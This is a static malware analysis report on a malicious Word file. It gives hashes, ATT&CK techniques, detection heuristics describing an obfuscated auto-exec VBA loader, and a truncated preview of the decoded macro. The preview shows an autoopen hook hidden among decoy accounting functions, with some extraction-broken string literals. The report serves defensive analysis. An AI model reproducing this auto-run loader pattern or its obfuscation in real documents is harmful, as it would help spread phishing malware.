Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 25f52d0733644bae…

MALICIOUS

Office (OOXML)

Size: 51.6 KB
Created: 2016-05-17 12:58:00 UTC
Authoring application: Microsoft Office Word 14.0000
First seen: 2020-09-04
MD5: ae308892f0a7d784cdc8bc4e8878faec
SHA-1: e091115c835b129116606db68e6b489d91951df7
SHA-256: 25f52d0733644bae41ec079c69a5e3d9dc66c0887ba89a1a3e79c38fd2edb5d9
Risk Score: 362

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1566.001 Phishing: Spearphishing Attachment

This OOXML document contains a highly obfuscated VBA macro loader, indicated by multiple critical heuristic firings including 'OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER' and ClamAV detections. The 'autoopen' subroutine likely triggers the execution of malicious code, which is designed to download and execute a second-stage payload. The presence of VBA macros and the AutoOpen function strongly suggests a spearphishing attachment attack vector.

Heuristics (8)

  • ClamAV: Doc.Macro.ObfuscatedData-6136276-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Macro.ObfuscatedData-6136276-0
  • VBA project inside OOXML [medium, 5 related findings] OOXML_VBA
    Document contains a VBA project (VBA macros present)
  • Obfuscated auto-exec VBA loader [critical] OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  • AutoOpen macro [high] OLE_VBA_AUTOOPEN
    AutoOpen macro
  • CreateObject call [high] OLE_VBA_CREATEOBJ
    CreateObject call
  • CallByName call [high] OLE_VBA_CALLBYNAME
    CallByName call
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas (in document text: OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006 (in document text: OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationships (in document text: OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/math (in document text: OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing (in document text: OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing (in document text: OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/main (in document text: OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordml (in document text: OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroup (in document text: OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInk (in document text: OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordml (in document text: OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShape (in document text: OOXML body / shared strings)

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source from OOXML)
Size: 27982 bytes
SHA-256: 0207304178dcd5c2819a10d32b55665891861d0c82ef2f24551d9f24ebf832b9
Preview (script): first 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Public Function EjecutaSQL(ByRef SQL As String) As Boolean
    EjecutaSQL = False
    On Error Resume Next
    Conn.Execute SQL
    If Err.Number <> 0 Then
        Err.Clear
    Else
        EjecutaSQL = True
    End If
End Function



Public Function DirectorioEAT() As Boolean
    On Error GoTo EDirecEAT
    DirectorioEAT = False
    If Dir("C:\AEAT", vbDirectory) = "" Then
        MsgBox "No se encuentra la carpeta de la agencia tributaria.  ( C:\AEAT )", vbExclamation
    Else
        DirectorioEAT = True
    End If
    Exit Function
EDirecEAT:
    Err.Clear
End Function



Sub autoopen()
EjecutaSQLDo 0.4, 5, -0.6
End Sub



Public Function EstaLaCuentaBloqueada(ByRef codmacta As String, Fecha As Date) As Boolean
Dim i As Integer

        EstaLaCuentaBloqueada = False
        If vParam.CuentasBloqueadas <> "" Then
            i = InStr(1, vParam.CuentasBloqueadas, codmacta & ":")
            If i > 0 Then
                
                If Fecha >= CDate(Mid(vParam.CuentasBloqueadas, i + Len(codmacta) + 1, 10)) Then EstaLaCuentaBloqueada = True
            End If
        End If
End Function


Public Sub CerrarRs(ByRef Rsss As String)
    On Error Resume Next
    Rsss.Close
    If Err.Number <> 0 Then Err.Clear
End Sub











Public Function SerieNumeroFactura(Posiciones As Integer, Serie As String, Numerofactura As String)
Dim i As Integer
Dim Cad As String
    
    i = Posiciones - Len(Numerofactura) - Len(Serie)
    If i <= 0 Then
        
        Cad = Right(Numerofactura, Posiciones - Len(Numerofactura))
    Else
        Cad = String(i, "0") & Numerofactura
    End If
    SerieNumeroFactura = Serie & Cad
    
    
End Function



Public Function EsEntero(TEXTO As String) As Boolean
Dim i As Integer
Dim C As Integer
Dim L As Integer
Dim res As Boolean

    res = True
    EsEntero = False

    If Not IsNumeric(TEXTO) Then
        res = False
    Else
        
        C = 0
        L = 1
        Do
            i = InStr(L, TEXTO, ".")
            If i > 0 Then
                L = i + 1
                C = C + 1
            End If
        Loop Until i = 0
        If C > 1 Then res = False
        
        
        If C = 0 Then
            L = 1
            Do
                i = InStr(L, TEXTO, ",")
                If i > 0 Then
                    L = i + 1
                    C = C + 1
                End If
            Loop Until i = 0
            If C > 1 Then res = False
        End If
        
    End If
        EsEntero = res
End Function


Attribute VB_Name = "Module6"
Public Sub NombreSQL(ByRef CADENA As String)
Dim J As Integer
Dim i As Integer
Dim Aux As String
    J = 1
    Do
        i = InStr(J, CADENA, "
        If i > 0 Then
            Aux = Mid(CADENA, 1, i - 1) & "\"
            CADENA = Aux & Mid(CADENA, i)
            J = i + 2
        End If
    Loop Until i = 0
End Sub

Public Function DevNombreSQL(CADENA As String) As String
Dim J As Integer
Dim i As Integer
Dim Aux As String
    J = 1
    Do
        i = InStr(J, CADENA, "
        If i > 0 Then
            Aux = Mid(CADENA, 1, i - 1) & "\"
            CADENA = Aux & Mid(CADENA, i)
            J = i + 2
        End If
    Loop Until i = 0
    DevNombreSQL = CADENA
End Function


Attribute VB_Name = "Module2"
Public Result__1 As Object
Public Freddy_Result As Object
Public Result__3 As Object
Public MassiveA() As String
Public Result__4 As String
Public Result__Warning As String
Public Result_sedming As Object
 Public Constant_4 As String
Public constans_Result() As String
Const INTERVAl_MILLIS_DO_EVENTS As Long = 100
Public Function newStringBuilder() As String
 newStringBuilder = ""
End Funct
... (truncated)
Filename: vbaProject_00.bin
Kind: vba-project
Source: OOXML VBA project: word/vbaProject.bin
Size: 76288 bytes
SHA-256: f6ed7cedb24df52fefae87ecc496eea7abfc450ff1fcc4804c04005a530c4809
Detection
ClamAV: Doc.Macro.ObfuscatedData-6136276-0
Obfuscation or payload: unlikely